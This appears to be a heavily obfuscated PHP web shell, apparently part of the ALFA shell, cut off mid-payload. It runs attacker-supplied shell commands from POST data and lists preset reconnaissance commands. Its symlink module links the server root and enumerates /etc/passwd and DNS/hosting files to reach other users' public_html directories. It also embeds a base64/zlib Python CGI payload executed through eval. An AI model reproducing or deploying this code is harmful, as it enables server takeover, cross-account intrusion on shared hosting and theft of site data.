"\x3c\x44\151\x76\x20\143\x6c\141\x73\163\x3d\x68\145\141\144\145\x72\x3e\74\x62\x72\76\74\143\x65\x6e\164\x65\162\76"; goto nsMEl; Y7QC1: echo "\74\x2f\x63\x65\156\x74\x65\162\76\74\x62\x72\x3e"; goto H5aYc; nsMEl: if (empty($_POST["\x61\x6a\141\170"]) && !empty($_POST["\x61\154\146\x61\x31"])) { $_SESSION[md5($_SERVER["\110\x54\124\120\x5f\110\x4f\x53\x54"]) . "\141\x6a\141\170"] = false; } goto sqAu0; ugNIm: echo "\x3c\57\144\151\166\x3e"; goto LoqkT; sqAu0: if ($GLOBALS["\x73\171\163"] == "\x77\x69\x6e") { $process = array("\124\x61\163\153\x20\x4c\151\163\x74" => "\164\x61\163\x6b\x6c\151\x73\x74\40\57\x56", "\x53\x79\x73\164\145\155\40\x49\x6e\146\x6f" => "\163\x79\x73\x74\145\x6d\x69\156\x66\x6f", "\101\x63\164\151\x76\145\x20\103\x6f\156\156\145\143\x74\151\x6f\156\x73" => "\x6e\145\164\163\x74\x61\x74\x20\55\141\x6e", "\122\x75\156\156\151\x6e\147\x20\x53\145\x72\166\151\x63\145\x73" => "\x6e\145\x74\x20\163\x74\141\x72\x74", "\125\x73\145\x72\40\101\x63\x63\x6f\x75\156\164\163" => "\x6e\x65\x74\40\165\x73\145\x72", "\x53\150\157\x77\40\x43\x6f\155\160\x75\164\x65\x72\163" => "\x6e\x65\164\40\166\151\x65\x77", "\x41\x52\120\40\x54\141\142\x6c\145" => "\x61\162\160\40\55\141", "\x49\x50\40\x43\157\x6e\146\151\x67\x75\x72\141\x74\151\x6f\156" => "\x69\x70\143\x6f\x6e\x66\151\x67\40\57\x61\154\154"); } else { $process = array("\x50\x72\157\x63\x65\163\x73\x20\163\x74\141\x74\165\x73" => "\x70\163\40\x61\x75\170", "\123\x79\163\x6c\x6f\147" => "\143\141\164\40\57\x65\164\143\57\x73\x79\163\154\x6f\x67\x2e\143\x6f\x6e\146", "\122\x65\x73\157\154\x76" => "\143\141\x74\x20\x2f\145\x74\143\x2f\x72\145\x73\157\x6c\x76\56\143\157\x6e\x66", "\x48\157\163\164\163" => "\143\141\x74\x20\57\x65\x74\x63\x2f\x68\x6f\x73\164\163", "\103\160\x75\x69\156\146\157" => "\x63\x61\164\x20\57\160\162\x6f\143\57\x63\x70\x75\x69\x6e\146\157", "\126\x65\x72\x73\151\157\156" => "\x63\141\164\x20\x2f\160\x72\157\x63\57\166\x65\162\x73\x69\157\x6e", "\x53\x62\x69\x6e" => "\154\x73\40\x2d\141\154\x20\x2f\x75\163\x72\57\163\x62\x69\x6e", "\111\156\164\145\162\x72\x75\x70\x74\x73" => "\143\141\x74\40\x2f\160\162\x6f\143\57\151\156\164\145\162\x72\165\x70\164\x73", "\x6c\x73\141\164\164\x72" => "\x6c\x73\141\x74\x74\x72\40\55\166\141", "\x55\160\x74\151\x6d\145" => "\165\x70\164\x69\155\x65", "\106\x73\164\141\142" => "\x63\141\x74\x20\x2f\145\x74\x63\x2f\146\163\164\x61\x62"); } goto C9ltr; q4KjS: alfahead(); goto BZc7o; H5aYc: if (!empty($_POST["\x61\x6c\146\141\61"])) { goto nVVIO; Uh7KO: echo alfaEx($cmd . $_POST["\141\154\146\x61\x31"]); goto NPW9E; nVVIO: echo "\74\160\162\145\x20\x63\154\141\x73\x73\x3d\x27\155\x6c\61\47\40\163\x74\x79\154\145\x3d\47\x6d\x61\162\x67\151\156\55\164\x6f\x70\72\x35\x70\x78\47\x20\x3e"; goto qwOBI; qwOBI: if (isset($GLOBALS["\x67\x6c\x6f\x62\x5f\x63\150\x64\151\162\137\146\x61\x6c\163\x65"]) && !empty($_POST["\143"])) { $cmd = "\143\144\40\x27" . addslashes($_POST["\143"]) . "\47\x3b"; } goto Uh7KO; NPW9E: echo "\x3c\x2f\x70\x72\145\x3e"; goto sbbMt; sbbMt: } goto ugNIm; C9ltr: foreach ($process as $n => $link) { echo "\x3c\141\40\x68\162\x65\146\x3d\42\152\x61\166\141\x73\143\162\151\160\164\72\166\x6f\151\x64\50\x30\x29\x3b\42\40\x6f\x6e\x63\x6c\151\143\153\x3d\x22\x67\50\x27\160\162\157\x63\x27\x2c\x6e\165\x6c\154\54\x27" . $link . "\x27\x29\x22\x3e\40\x7c\40" . $n . "\x20\174\40\x3c\57\x61\76"; } goto Y7QC1; GUl5P: } goto gM0bI; mMKnX: function __ZW5jb2Rlcg($s) { return nIWUkxhnhj($s); } goto J3y62; e_w5I: function alfasymlink() { goto BCTc0; lCIzh: echo "\x3c\144\x69\166\40\143\154\141\163\163\x3d\150\145\x61\x64\x65\x72\x3e\74\142\162\x3e\74\143\145\x6e\164\x65\162\76\74\x64\151\166\40\x63\154\141\x73\163\x3d\x22\164\x78\x74\x66\157\x6e\x74\x5f\150\x65\141\144\x65\x72\42\x3e\x7c\x20\123\171\155\x6c\x69\156\x6b\40\174\74\x2f\144\x69\x76\x3e\74\x63\145\156\164\145\162\76\74\150\x33\x3e\x3c\x61\x20\x68\162\145\146\75\x6a\141\x76\x61\163\143\162\151\x70\164\x3a\166\157\151\144\50\60\x29\40\x6f\x6e\143\x6c\x69\x63\153\75\x22\x67\50\47\x73\x79\x6d\154\151\x6e\153\47\54\156\x75\x6c\x6c\x2c\156\x75\x6c\154\x2c\47\x73\171\x6d\160\150\x70\47\51\x22\x3e\x7c\x20\x53\171\155\x6c\151\x6e\x6b\x28\x20\160\150\160\x20\51\x20\x7c\40\74\x2f\141\x3e\x3c\141\40\x68\x72\x65\146\75\x6a\x61\166\x61\163\143\x72\x69\x70\164\72\166\x6f\151\144\50\x30\x29\x20\157\156\143\x6c\151\x63\x6b\x3d\42\x67\50\x27\x73\x79\x6d\154\151\x6e\153\47\54\x6e\x75\154\x6c\54\x6e\x75\x6c\x6c\54\x27\163\171\155\x70\145\162\x6c\47\51\42\76\174\x20\x53\171\x6d\154\x69\156\153\50\x20\x70\145\162\154\x20\51\x20\174\x20\74\x2f\x61\x3e\x3c\x61\40\x68\162\x65\x66\x3d\152\x61\166\141\x73\143\162\151\x70\164\72\166\x6f\151\144\50\x30\51\x20\x6f\x6e\x63\x6c\x69\x63\153\75\42\147\50\x27\x73\x79\x6d\x6c\151\x6e\x6b\x27\54\156\165\154\x6c\x2c\156\x75\x6c\x6c\54\x27\163\x79\155\x70\x79\47\x29\x22\x3e\x7c\x20\x53\171\x6d\x6c\x69\x6e\153\50\40\x70\x79\x74\150\x6f\x6e\40\x29\x20\x7c\40\74\57\x61\76\x3c\141\x20\x68\162\145\x66\75\x6a\x61\166\141\x73\143\162\x69\x70\164\x3a\166\x6f\x69\144\x28\60\x29\x20\157\156\143\154\151\x63\x6b\x3d\x22\147\50\x27\163\171\x6d\154\151\x6e\x6b\x27\x2c\x6e\165\x6c\154\54\x6e\x75\154\154\x2c\x6e\165\154\x6c\x2c\x6e\165\154\154\54\47\x53\171\155\106\x69\x6c\x65\47\51\42\76\x7c\x20\x46\151\154\145\40\x53\x79\x6d\x6c\x69\x6e\153\x20\174\x20\74\57\x61\76\x3c\57\x68\63\76\74\x2f\x63\x65\x6e\x74\145\x72\76"; goto NXfiu; S3_Qf: if (isset($_POST["\141\154\146\x61\62"]) && $_POST["\141\154\x66\141\x32"] == "\x73\x79\x6d\160\x68\160") { goto Xzg3X; wXe2r: echo "\x3c\57\143\145\x6e\164\x65\x72\76\x3c\x2f\x74\141\142\x6c\145\76"; goto loB2c; Xzg3X: $cant_symlink = true; goto xWJE_; AfsmT: if ($cant_symlink) { echo "\x3c\160\162\145\x20\151\x64\75\42\163\x74\162\117\165\164\x70\x75\x74\42\40\x73\x74\171\154\x65\75\42\155\x61\162\x67\x69\156\x2d\x74\157\x70\x3a\65\x70\170\42\40\143\154\x61\x73\163\x3d\42\155\x6c\61\42\x3e\74\142\162\x3e\74\x66\x6f\x6e\x74\x20\x63\x6f\x6c\157\x72\75\x22\x23\106\106\106\106\106\x46\42\x3e\x45\x72\162\157\162\x2e\x2e\x2e\x3c\57\146\x6f\x6e\164\x3e\74\x2f\x62\x3e\74\x62\162\76"; } goto wXe2r; xWJE_: if (function_exists("\163\171\x6d\x6c\x69\156\x6b") || _alfa_can_runCommand(false, false)) { goto NTiWm; NTiWm: @mkdir("\x61\154\146\141\163\x79\155\x6c\151\x6e\x6b", 0777); goto y2UZK; HUOn4: if (_alfa_file_exists("\57\x65\x74\143\57\156\141\x6d\145\144\56\x63\x6f\x6e\x66") && !_alfa_file_exists("\57\145\x74\x63\57\x76\x69\162\164\165\x61\x6c\57\144\157\155\x61\x69\156\157\167\x6e\145\x72\x73") && _alfa_file_exists("\57\x65\x74\x63\x2f\x76\141\154\151\x61\163\x65\x73\x2f")) { goto UKMm_; S7c1c: $template = "\74\x74\162\x3e\74\164\144\x3e\x3c\163\160\141\156\40\163\x74\x79\154\145\x3d\42\x63\x6f\x6c\x6f\x72\72\43\106\x46\x46\106\60\x31\x3b\42\x3e\173\143\157\x75\156\164\x7d\74\x2f\163\160\141\x6e\76\74\57\164\144\x3e\74\x74\x64\x20\163\x74\171\154\x65\75\x22\x74\x65\170\164\55\141\x6c\x69\x67\x6e\72\154\145\146\164\73\x22\x3e\74\x61\40\x74\x61\x72\147\x65\x74\x3d\42\137\x62\154\141\156\153\x22\x20\150\162\x65\x66\75\x22\173\x68\164\x74\160\x7d\x22\57\76\74\x73\x70\x61\156\40\163\164\171\x6c\x65\75\42\x63\157\x6c\157\x72\x3a\x23\60\x30\101\62\62\x30\73\x6d\141\162\x67\151\x6e\x2d\x6c\145\x66\164\x3a\61\x30\160\x78\x3b\x22\x3e\x3c\142\76\x7b\144\157\155\x61\x69\x6e\x7d\x3c\57\142\x3e\x20\74\x2f\x61\76\x3c\x2f\163\160\141\156\76\x3c\x2f\164\x64\76\74\164\x64\x20\x73\x74\171\x6c\145\x3d\42\x74\145\170\164\55\x61\x6c\x69\147\x6e\x3a\154\x65\x66\x74\73\x22\76\x3c\x73\x70\141\x6e\40\163\164\x79\x6c\x65\75\42\143\x6f\x6c\x6f\x72\x3a\x23\106\x46\106\x46\x46\106\x3b\x6d\141\x72\147\151\x6e\55\x6c\145\146\x74\72\x31\x30\x70\x78\73\42\x3e\x3c\x62\x3e\173\x6f\x77\x6e\145\x72\175\x3c\x2f\146\x6f\156\164\x3e\x3c\x2f\142\x3e\74\x2f\164\x64\76\74\164\x64\x3e\74\141\x20\150\162\145\146\75\x22\141\154\x66\141\163\171\x6d\x6c\x69\156\x6b\x2f\x72\x6f\x6f\164\x7b\163\171\x6d\x70\x61\164\x68\175\42\40\x74\x61\x72\x67\x65\x74\75\x22\x5f\142\x6c\141\156\153\42\76\74\x73\160\141\156\x20\x73\164\171\154\x65\x3d\x22\x63\x6f\x6c\157\162\72\x23\x46\x46\x30\x30\60\60\73\42\x3e\x53\x79\x6d\x6c\x69\156\153\x3c\57\163\160\141\x6e\76\74\x2f\x61\x3e\x3c\x2f\164\x64\76\x3c\57\x74\x72\x3e"; goto cdOXM; GltVh: $lines = array(); goto VI0C4; k8ye9: echo $table_header; goto Wmaeq; Py4mT: $error = false; goto aUGom; VnspA: $f_black = array(); goto Py4mT; X2zKo: $state = $domains["\163\x74\x61\164\145"]; goto LReLk; VI0C4: $anony_domains = array(); goto dSDP7; KiAWq: $can_runcmd = _alfa_can_runCommand(false, false); goto jSzn3; dSDP7: $anonymous_users = array(); goto VnspA; K6zg0: $lines = $domains["\154\x69\x6e\145\163"]; goto X2zKo; Eqpn8: $domains = alfaGetDomains(); goto K6zg0; GAvhT: $cant_symlink = false; goto msCs1; wLTWD: if ($anonymous) { foreach ($anonymous_users as $owner) { goto Kn2Le; tR4_W: echo str_replace(array("\173\143\157\165\156\x74\175", "\x7b\x68\x74\164\x70\x7d", "\x7b\x64\x6f\x6d\141\151\x6e\175", "\x7b\x6f\167\x6e\x65\x72\175", "\173\x73\171\x6d\160\x61\x74\x68\x7d"), array($count, $http, "\133\x3f\77\x3f\x3f\135", $owner, $sympath), $template); goto jE8CH; Kn2Le: $sympath = str_replace("\173\x75\x73\145\x72\x7d", $owner, $makepwd); goto s40fH; jE8CH: $count++; goto HgjLF; s40fH: $http = "\x6a\x61\166\141\x73\x63\x72\151\x70\164\x3a\x61\154\x65\x72\164\x28\x27\x77\145\40\x63\x61\156\x74\40\146\x69\156\x64\40\144\x6f\x6d\141\x69\x6e\56\x2e\56\47\x29"; goto tR4_W; HgjLF: } } goto GAvhT; jSzn3: if (!$is_posix && !$can_runcmd) { goto jYAnq; jYAnq: $anonymous = true; goto YN1Dz; RUyQl: $lines = _alfa_file("\57\145\x74\143\57\160\141\163\163\x77\144"); goto gV6fL; YN1Dz: $anony_domains = $domains["\x6c\x69\156\145\163"]; goto RUyQl; gV6fL: } goto k8ye9; dKWCX: $makepwd = "\x2f\150\157\x6d\x65\57\x7b\x75\x73\x65\x72\175\x2f\160\x75\142\154\x69\143\x5f\x68\164\x6d\154\57"; goto Eqpn8; UKMm_: echo "\x3c\x63\x65\x6e\x74\145\162\76"; goto GltVh; LReLk: $is_posix = function_exists("\x70\x6f\163\151\170\137\x67\145\164\160\167\x75\151\144") && function_exists("\146\151\154\145\157\167\x6e\145\x72"); goto KiAWq; aUGom: $anonymous = false; goto dKWCX; cdOXM: foreach ($lines as $line) { goto GthqW; IF7_z: if ($anonymous) { goto MEWsF; Fs3Dy: $temp_black = array(); goto KoVDY; iMdU8: if ((int) $userid < 500) { continue; } goto DqPOk; KoVDY: $finded = false; goto jfIxS; DqPOk: $domain = "\x5b\77\77\77\x3f\x3f\x5d"; goto Fs3Dy; yKVT6: $userid = $explode[2]; goto iMdU8; jfIxS: foreach ($anony_domains as $anony) { goto Qh4Rw; z4FnP: $sub_domain = str_replace(array("\55", "\x2e"), '', $domain); goto X8abx; Qh4Rw: if ($state == "\156\x61\x6d\x65\144\x2e\143\157\156\x66") { if (@strstr($anony, "\x7a\x6f\156\145")) { preg_match_all("\43\172\x6f\x6e\x65\40\42\x28\x2e\52\x29\42\43", $anony, $data); $domain = $data[1][0]; } else { continue; } } elseif ($state == "\x6e\141\x6d\145\144" || $state == "\x76\141\x6c\x69\x61\163\x65\x73") { goto DLofd; EkyYR: if ($state == "\156\x61\155\145\x64") { $anony = rtrim($anony, "\56\x64\142"); } goto Mu7bM; DLofd: if ($anony == "\56" || $anony == "\56\x2e") { continue; } goto EkyYR; Mu7bM: $domain = $anony; goto ENyrM; ENyrM: } goto z4FnP; X8abx: if (substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)) { goto hvc0v; aMQE1: $sympath = str_replace("\173\165\x73\x65\162\175", $owner, $makepwd); goto oK7Dy; UP3dd: $count++; goto AAB1O; oK7Dy: $http = "\x68\164\164\160\72\x2f\57" . $domain; goto z4jnl; kedhG: $finded = true; goto qwLbJ; hvc0v: if (in_array($owner . $domain, $temp_black)) { continue; } goto aMQE1; AAB1O: $temp_black[] = $owner . $domain; goto kedhG; z4jnl: echo str_replace(array("\173\143\157\165\x6e\164\x7d", "\x7b\x68\164\x74\160\x7d", "\173\x64\x6f\x6d\x61\151\156\175", "\173\157\x77\x6e\x65\x72\x7d", "\173\163\171\x6d\160\141\x74\150\x7d"), array($count, $http, $domain, $owner, $sympath), $template); goto UP3dd; qwLbJ: } goto HUy5t; HUy5t: } goto EKD0S; EAeAb: $owner = $explode[0]; goto z9NJc; EKD0S: if (!$finded) { $anonymous_users[] = $owner; } goto zMz6j; z9NJc: $owner_len = strlen($owner) - 1; goto yKVT6; MEWsF: $explode = explode("\72", $line); goto EAeAb; zMz6j: } else { if ($state == "\x6e\141\155\x65\144\x2e\143\157\156\146") { if (@strstr($line, "\172\157\x6e\145")) { preg_match_all("\43\x7a\x6f\x6e\145\x20\42\x28\56\x2a\x29\x22\43", $line, $data); $domain = $data[1][0]; } else { continue; } } elseif ($state == "\x6e\x61\x6d\x65\x64" || $state == "\166\x61\154\x69\141\163\x65\163") { goto suxO9; suxO9: if ($line == "\56" || $line == "\56\56") { continue; } goto d3t52; d3t52: if ($state == "\x6e\141\155\x65\x64") { $line = rtrim($line, "\x2e\144\142"); } goto F597t; F597t: $domain = $line; goto VXynE; VXynE: } if (strlen(trim($domain)) > 2 && $state != "\x70\x61\163\163\167\x64") { if (!_alfa_file_exists("\57\x65\x74\x63\57\x76\141\154\x69\141\x73\x65\163\57" . $domain, false)) { continue; } if ($is_posix) { $user = @posix_getpwuid(@fileowner("\x2f\145\x74\x63\57\x76\141\154\x69\141\x73\x65\163\x2f" . $domain)); $owner = $user["\x6e\141\155\145"]; } elseif ($can_runcmd) { $owner = alfaEx("\163\x74\141\x74\x20\x2d\143\40\x27\45\x55\x27\x20\57\145\164\x63\57\x76\x61\154\x69\x61\x73\145\163\x2f" . $domain, false, false); } } } goto o5Z_T; o5Z_T: if (!$anonymous) { goto SX9bZ; X46Cw: $sympath = str_replace("\173\x75\x73\145\162\x7d", $owner, $makepwd); goto vM5gh; uz3RL: echo str_replace(array("\x7b\143\157\165\156\x74\x7d", "\173\x68\164\x74\x70\175", "\173\x64\157\155\x61\x69\x6e\x7d", "\173\x6f\x77\x6e\145\162\175", "\x7b\x73\171\x6d\160\141\164\x68\175"), array($count, $http, $domain, $owner, $sympath), $template); goto teE3k; vM5gh: $http = "\150\x74\x74\x70\x3a\57\x2f" . $domain; goto S2LX0; teE3k: $count++; goto HiFzh; HiFzh: $f_black[] = $owner . $domain; goto vemtw; SX9bZ: if (strlen($owner) == 0 || in_array($owner . $domain, $f_black)) { continue; } goto X46Cw; S2LX0: if ($state == "\160\x61\x73\163\167\144") { $http = "\x6a\x61\166\141\x73\143\162\151\x70\164\72\141\154\145\x72\164\x28\x27\x77\x65\x20\x63\141\156\x74\x20\x66\151\x6e\x64\40\x64\x6f\155\x61\151\156\56\56\56\x27\x29"; } goto uz3RL; vemtw: } goto mbyH5; GthqW: $domain = ''; goto YJgpJ; YJgpJ: $owner = ''; goto IF7_z; mbyH5: } goto wLTWD; Wmaeq: $count = 1; goto S7c1c; msCs1: } else { goto KBEFQ; iy2C0: $count = 1; goto JrFyS; VKMbT: $sole = _alfa_file("\57\x65\164\x63\57\166\151\162\164\165\141\154\57\144\x6f\x6d\141\x69\156\157\x77\x6e\145\162\x73"); goto iy2C0; f20Ti: if (_alfa_file_exists("\57\145\x74\143\57\x76\151\x72\164\165\141\154\x2f\x64\x6f\x6d\x61\151\x6e\x6f\x77\x6e\145\162\163")) { $makepwd = "\x2f\x68\157\x6d\145\57\x7b\x75\x73\x65\x72\175\x2f\160\x75\142\x6c\x69\x63\x5f\x68\164\155\154"; $is_direct = true; } goto VKMbT; t1WHv: if ($sole) { foreach ($sole as $visible) { if (@strstr($visible, "\72")) { goto FX8Ex; FX8Ex: $solevisible = explode("\72", $visible); goto iZmAb; mdDfm: echo str_replace(array("\173\x63\157\165\x6e\164\x7d", "\x7b\x75\x73\x65\162\175", "\x7b\x75\162\154\x7d", "\173\143\x77\144\175"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template); goto JNUAC; iZmAb: $cwd = str_replace("\x7b\x75\163\145\162\x7d", trim($solevisible[1]), $makepwd); goto mdDfm; JNUAC: } } } else { $passwd = _alfa_file("\57\x65\164\x63\57\160\141\163\163\x77\144"); if ($passwd) { goto Rw9Yn; gOCzi: foreach ($site_domains as $line) { if ($is_named) { if (@strstr($line, "\x7a\x6f\x6e\145")) { goto tgg7K; tgg7K: preg_match_all("\x23\172\157\156\145\x20\42\50\x2e\52\51\x22\43", $line, $data); goto FG0fJ; FG0fJ: $domain = $data[1][0]; goto sgMDF; sgMDF: if (strlen($domain > 2) && !empty($domain)) { $domains[] = $domain; } goto uew7M; uew7M: } } else { $domains[] = $line; } } goto n6Ko7; szG6P: if (!$site_domains) { goto NAIii; NAIii: $site_domains = alfaEx("\x6c\163\x20\57\x65\164\x63\x2f\x76\x69\x72\x74\x75\141\154\x2f"); goto jngrd; jngrd: $site_domains = explode("\xa", $site_domains); goto K5lDU; K5lDU: if (!$site_domains) { $site_domains = _alfa_file("\57\145\x74\x63\57\156\141\x6d\145\x64\x2e\143\157\156\x66"); if ($site_domains) { $is_named = true; } } goto PHUwp; PHUwp: } goto gOCzi; He6dT: $site_domains = @scandir("\57\x65\x74\143\x2f\166\151\162\x74\x75\x61\154\57"); goto szG6P; bFU86: $users = array(); goto KAtSd; KAtSd: $domains = array(); goto rDYuM; lltrc: foreach ($uknowns as $user => $home) { if ($is_direct) { $cwd = str_replace("\173\x75\x73\145\162\175", $user, $makepwd); } else { $expl = explode("\x7d\x2f", $makepwd); $cwd = $home . "\57" . $expl[1]; } $html .= str_replace(array("\x7b\143\157\165\156\x74\x7d", "\173\165\x73\145\162\x7d", "\173\x75\162\154\x7d", "\173\x63\167\x64\175"), array($x++, $user, "\x5b\x3f\x3f\77\x3f\77\x5d", $cwd), $template); } goto SjnwV; QUUcr: foreach ($passwd as $user) { goto gdSS2; WCVRt: $users[$expl[0]] = $expl[5]; goto YCWHt; gdSS2: $user = trim($user); goto pKSeg; pKSeg: $expl = explode("\x3a", $user); goto tmQfI; tmQfI: if ((int) $expl[2] < 500) { continue; } goto WCVRt; YCWHt: } goto He6dT; SM_Va: foreach ($users as $user => $home) { foreach ($domains as $domain) { goto moQgy; moQgy: $user_len = strlen($user) - 1; goto uLJXR; oUBfA: $five_user = substr($user, 0, $user_len); goto bpi0l; bpi0l: $five_domain = substr($sub_domain, 0, $user_len); goto eTTEh; eTTEh: if ($five_user == $five_domain) { if ($is_direct) { $cwd = str_replace("\173\165\x73\145\x72\175", $user, $makepwd); } else { $expl = explode("\175\57", $makepwd); $cwd = $home . "\57" . $expl[1]; } $html .= str_replace(array("\173\x63\157\165\x6e\164\175", "\173\165\163\145\162\x7d", "\173\x75\x72\x6c\x7d", "\173\143\x77\144\175"), array($x++, $user, $domain, $cwd), $template); } else { $uknowns[$user] = $home; } goto VFAj6; uLJXR: $sub_domain = str_replace(array("\55", "\x2e"), '', $domain); goto oUBfA; VFAj6: } } goto ruriQ; ICDqu: $is_named = false; goto bFU86; Rw9Yn: $html = ''; goto ICDqu; n6Ko7: $x = 1; goto SM_Va; SjnwV: echo $html; goto adCPv; rDYuM: $uknowns = array(); goto QUUcr; ruriQ: $uknowns = array_unique($uknowns); goto lltrc; adCPv: } } goto Cj4SH; Qis60: $makepwd = alfaMakePwd(); goto f20Ti; KBEFQ: $is_direct = false; goto Qis60; LqzSL: $cant_symlink = false; goto JOxNp; JrFyS: echo $table_header; goto SJK47; Cj4SH: echo "\x3c\x2f\164\141\142\x6c\x65\76"; goto LqzSL; SJK47: $template = "\74\x74\162\76\x3c\x74\x64\x3e\x3c\163\160\x61\x6e\x20\x73\164\171\x6c\x65\x3d\x22\143\x6f\x6c\157\162\72\x23\106\x46\x46\106\60\x31\73\x22\x3e\173\143\157\x75\x6e\x74\175\74\x2f\163\x70\141\156\x3e\74\x2f\x74\144\76\x3c\164\x64\40\x73\164\x79\154\145\x3d\x22\164\145\170\x74\55\141\154\151\147\x6e\72\154\x65\x66\164\x3b\42\x3e\x3c\141\x20\164\141\x72\x67\145\x74\x3d\x22\x5f\x62\154\141\156\x6b\x22\40\150\162\145\x66\75\x22\x68\164\x74\160\72\x2f\x2f\167\x77\167\56\173\x75\x72\154\x7d\x22\57\x3e\74\x73\160\x61\x6e\x20\x73\x74\171\154\x65\x3d\x22\x63\157\x6c\157\162\x3a\43\x30\60\x41\x32\x32\x30\73\155\x61\162\147\x69\x6e\55\x6c\x65\x66\164\x3a\x31\x30\160\x78\x3b\42\x3e\x3c\x62\x3e\173\165\x72\x6c\175\74\x2f\x62\76\40\x3c\57\x61\x3e\74\57\x73\x70\141\156\76\74\57\164\x64\76\74\164\x64\40\163\164\171\x6c\x65\75\42\x74\x65\x78\x74\x2d\x61\x6c\151\x67\156\72\154\145\x66\164\73\x22\76\74\x73\160\x61\156\40\163\x74\x79\154\x65\x3d\42\x63\x6f\x6c\x6f\x72\x3a\x23\x46\106\106\106\x46\x46\73\x6d\x61\x72\147\151\x6e\x2d\x6c\145\146\164\72\61\x30\160\170\x3b\42\76\x3c\x62\x3e\173\165\163\x65\x72\175\x3c\57\x66\157\156\x74\76\74\57\x62\76\x3c\x2f\164\144\x3e\x3c\164\x64\x3e\x3c\141\40\150\x72\145\146\x3d\x22\x61\x6c\146\x61\163\171\155\x6c\x69\156\153\57\x72\x6f\157\x74\173\143\x77\x64\175\x22\40\164\x61\162\x67\145\x74\75\42\137\x62\x6c\141\x6e\153\42\76\74\x73\160\141\x6e\40\163\x74\171\x6c\x65\x3d\x22\x63\x6f\x6c\157\162\72\43\106\106\60\x30\60\x30\x3b\42\x3e\123\171\x6d\154\x69\x6e\x6b\x3c\x2f\x73\160\141\156\76\x3c\57\141\76\74\57\x74\x64\x3e\x3c\x2f\164\x72\76"; goto t1WHv; JOxNp: } goto Sd00h; y2UZK: alfacgihtaccess("\163\x79\x6d", "\x61\x6c\146\141\x73\x79\155\154\151\156\153\57"); goto hmyZh; nhSHu: $table_header = "\x3c\x70\162\145\x20\x69\x64\75\x22\x73\164\x72\x4f\x75\164\160\x75\164\42\x20\x73\164\x79\154\145\75\42\x6d\141\x72\147\x69\x6e\55\x74\157\160\72\65\x70\x78\x22\x20\x63\154\141\x73\163\x3d\42\x6d\x6c\x31\42\x3e\74\x62\x72\76\74\164\141\142\154\145\x20\151\144\x3d\x27\164\x62\154\137\163\x79\155\x70\x70\x68\x70\x27\x20\x61\x6c\151\147\x6e\75\47\x63\x65\x6e\164\x65\162\47\x20\167\x69\x64\x74\150\75\x27\x34\x30\x25\x27\x20\143\x6c\141\163\x73\x3d\x27\x6d\141\x69\156\47\40\142\157\162\x64\x65\x72\x3d\x27\x31\47\x3e\x3c\x74\144\76\74\163\160\x61\x6e\x20\163\x74\x79\x6c\x65\75\x27\x63\x6f\x6c\x6f\x72\x3a\43\x46\106\106\x46\x30\61\x3b\47\76\x3c\142\x3e\52\x3c\57\163\x70\141\x6e\76\74\x2f\x62\76\x3c\57\164\x64\x3e\x3c\x74\144\76\74\x73\x70\141\156\40\163\164\171\154\x65\x3d\47\143\x6f\154\x6f\x72\x3a\43\x30\60\x41\62\62\x30\x3b\47\76\74\142\x3e\x44\x6f\x6d\141\151\156\163\74\57\163\x70\x61\x6e\76\74\57\142\x3e\x3c\x2f\164\144\76\74\x74\144\76\74\x73\x70\141\x6e\40\163\x74\171\x6c\x65\75\x27\x63\157\x6c\x6f\162\x3a\x23\106\x46\x46\106\x46\106\x3b\47\x3e\x3c\x62\x3e\x55\x73\x65\162\163\74\x2f\x73\x70\141\x6e\76\74\57\x62\76\74\57\164\x64\x3e\x3c\x74\144\x3e\x3c\x73\x70\141\x6e\x20\x73\x74\171\x6c\145\x3d\47\143\157\154\157\x72\72\43\106\106\x30\x30\60\60\73\47\76\x3c\x62\x3e\x73\x79\155\x6c\x69\x6e\x6b\74\x2f\163\160\141\x6e\x3e\x3c\x2f\x62\x3e\74\x2f\x74\x64\x3e"; goto HUOn4; hmyZh: _alfa_symlink("\57", "\x61\154\x66\x61\x73\x79\155\154\151\156\x6b\57\x72\x6f\x6f\x74"); goto nhSHu; Sd00h: } else { echo "\x3c\160\x72\145\x20\x63\x6c\141\163\x73\x3d\155\x6c\x31\x20\x73\x74\x79\x6c\x65\x3d\x27\155\x61\162\147\151\156\55\164\x6f\x70\72\65\160\x78\x27\x3e\74\x62\76\x3c\x66\157\x6e\x74\40\143\157\x6c\157\162\x3d\x22\x23\x46\106\x46\x46\x46\x46\x22\76\133\x2b\x5d\x20\123\x79\155\x6c\x69\x6e\153\x20\x46\165\x6e\x63\x74\151\157\x6e\40\x44\x69\x73\x61\x62\x6c\x65\144\x20\x21\x3c\x2f\x62\x3e\74\57\146\x6f\156\x74\x3e\74\x2f\x70\162\145\76\x3c\57\x63\x65\156\x74\x65\x72\76"; $cant_symlink = false; } goto AfsmT; loB2c: } goto K33Os; NXfiu: if (isset($_POST["\141\x6c\146\x61\62"]) && ($_POST["\141\154\146\141\x32"] == "\163\171\x6d\x70\145\162\x6c" || $_POST["\x61\154\x66\x61\62"] == "\163\171\x6d\x70\171")) { goto CUPvn; tJTcG: if (strlen($resource) == 0) { echo AlfaiFrameCreator("\x63\147\151\x61\154\x66\x61\x2f" . $cginame); } else { echo $resource; } goto T8qCL; XnaGI: echo __pre(); goto Ya7an; NHXca: $py = "\x23\x21\x2f\x75\163\162\x2f\142\151\156\x2f\x70\171\x74\x68\x6f\x6e" . "\xa\x69\x6d\160\x6f\x72\x74\x20\172\x6c\x69\142\x2c\40\x62\141\163\x65\x36\x34\xa" . "\145\166\141\x6c\x28\143\157\x6d\x70\x69\154\x65\x28\172\x6c\151\x62\x2e\144\145\x63\x6f\x6d\x70\x72\145\163\163\50\142\x61\x73\145\66\x34\56\x62\x36\x34\x64\x65\x63\x6f\x64\x65\x28\42\145\x4a\171\x64\127\x47\x31\x76\62\x7a\131\x51\57\x6d\x7a\x2f\103\154\132\x46\x5a\156\x74\170\112\104\166\x59\x39\163\106\x78\x50\107\122\160\x73\x68\x58\x6f\x32\x6d\x48\x4e\115\101\x79\x4a\x49\144\101\151\x62\127\165\122\x52\131\107\x6b\131\x33\x74\x46\71\x39\164\x33\x78\x78\x64\112\164\x70\127\x30\155\x44\x35\131\106\110\156\x76\166\110\164\x34\x74\x4a\x61\67\x55\142\165\x56\162\x67\x6f\x68\116\125\x6b\127\161\x5a\x36\61\x57\x2b\x59\x56\70\160\x7a\x4f\115\164\67\164\164\x66\x6b\x32\64\x59\x55\x47\x71\x6f\x49\161\61\127\x34\67\127\160\x32\165\x75\102\x38\x4c\65\x55\x64\161\126\167\x35\154\165\126\x78\163\